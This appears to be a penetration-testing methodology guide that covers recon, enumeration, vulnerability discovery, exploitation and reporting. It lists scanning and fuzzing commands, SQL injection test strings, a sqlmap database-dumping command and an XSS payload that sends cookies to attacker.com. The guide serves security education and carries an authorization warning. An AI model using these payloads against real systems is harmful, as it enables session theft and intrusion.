Phase 1: Reconnaissance
Reconnaissance is the foundation of any successful penetration test. The more information you gather, the higher your chances of finding vulnerabilities.
Passive Recon — Without Touching the Target
# DNS information gathering
whois target.com
dig target.com ANY
subfinder -d target.com -o subdomains.txt
# Google Dorks
site:target.com filetype:pdf
site:target.com inurl:admin
site:target.com "index of /"
# Shodan for infrastructure intel
shodan search hostname:target.com
Active Recon — Direct Scanning
# Port and service scanning
nmap -sV -sC -p- --min-rate 5000 -oN scan.txt target.com
# Directory discovery
ffuf -u https://target.com/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 404
# Subdomain brute-forcing
ffuf -u https://FUZZ.target.com -w subdomains.txt -fc 404
Phase 2: Enumeration
After discovering the target, we dive deep into understanding the application.
Application Analysis
- Identify technologies in use (Wappalyzer, WhatWeb)
- Map all entry points (Login, Upload, API endpoints)
- Analyze JavaScript files for hidden endpoints
- Inspect HTTP headers for sensitive information leaks
whatweb -a 3 https://target.com
nikto -h https://target.com -ssl
python3 LinkFinder.py -i https://target.com -d
Phase 3: Vulnerability Discovery
Top Vulnerabilities to Check (OWASP Top 10)
| Vulnerability | Priority | Tools |
|---|---|---|
| SQL Injection | 🔴 High | sqlmap, manual |
| XSS | 🟡 Medium | XSStrike, Dalfox |
| SSRF | 🔴 High | Manual, Burp Suite |
| IDOR | 🟡 Medium | Manual |
| File Upload | 🔴 High | Manual |
SQL Injection — Manual Testing
-- Basic tests
' OR '1'='1
' OR 1=1--
' UNION SELECT NULL,NULL,NULL--
-- Time-based blind
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
Phase 4: Exploitation
⚠️ Warning: Only exploit systems you have explicit authorization to test.
# SQL Injection with sqlmap
sqlmap -u "https://target.com/page?id=1" --dbs --batch --level=5
# XSS cookie theft payload
<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>
Phase 5: Reporting
A good report must include:
- Executive Summary (non-technical, for management)
- Technical Details for each finding with CVSS score
- Proof of Concept steps
- Remediation Recommendations
- References and Resources